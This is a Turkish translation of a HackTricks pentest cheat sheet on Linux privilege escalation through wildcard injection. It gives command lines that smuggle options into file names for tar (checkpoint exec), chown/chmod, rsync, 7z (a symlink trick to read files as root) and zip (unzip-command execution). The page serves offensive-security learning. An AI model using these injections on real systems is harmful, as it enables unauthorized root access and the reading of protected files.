hacktricks/linux-hardening/privilege-escalation/wildcards-spare-tricks.md
2024-02-10 18:14:16 +00:00

4.8 KiB
Raw Blame History

AWS hacklemeyi sıfırdan kahraman olmak için htARTE (HackTricks AWS Kırmızı Takım Uzmanı) ile öğrenin!

HackTricks'ı desteklemenin diğer yolları:

chown, chmod

Diğer dosyalar için hangi dosya sahibi ve izinlerini kopyalamak istediğinizi belirtebilirsiniz

touch "--reference=/my/own/path/filename"

Bu, https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (kombine saldırı) kullanarak sömürülebilir.
Daha fazla bilgi için https://www.exploit-db.com/papers/33930

Tar

Keyfi komutları çalıştır:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Bu, https://github.com/localh0t/wildpwn/blob/master/wildpwn.py kullanarak sömürülebilir (tar saldırısı)
Daha fazla bilgi için https://www.exploit-db.com/papers/33930

Rsync

Keyfi komutları çalıştır:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

Bu, https://github.com/localh0t/wildpwn/blob/master/wildpwn.py kullanarak sömürülebilir. _(_rsync attack)
Daha fazla bilgi için https://www.exploit-db.com/papers/33930

7z

7z'de, *'den önce -- kullanarak (not: --, takip eden girişin parametre olarak işleme alınamayacağı anlamına gelir, bu durumda sadece dosya yolları) bir dosyayı okumak için keyfi bir hata oluşturabilirsiniz. Bu durumda root tarafından aşağıdaki gibi bir komut çalıştırılıyorsa:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

Ve bu yürütülen klasörde dosyalar oluşturabilirsiniz, @root.txt dosyasını ve root.txt dosyasını oluşturabilirsiniz, bu dosya istediğiniz dosyanın bir sembolik bağlantısı olabilir:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Ardından, 7z çalıştırıldığında, root.txt'yi sıkıştırması gereken dosyaların listesini içeren bir dosya olarak işleyecektir (@root.txt'nin varlığı bunu gösterir) ve 7z root.txt'yi okuduğunda /file/you/want/to/read'i okuyacak ve bu dosyanın içeriği bir dosya listesi olmadığı için bir hata fırlatacaktır ve içeriği gösterecektir.

Daha fazla bilgi için HackTheBox'tan CTF kutusu Write-up'larında.

Zip

Keyfi komutları çalıştırma:

zip name.zip files -T --unzip-command "sh -c whoami"
AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'ı desteklemenin diğer yolları: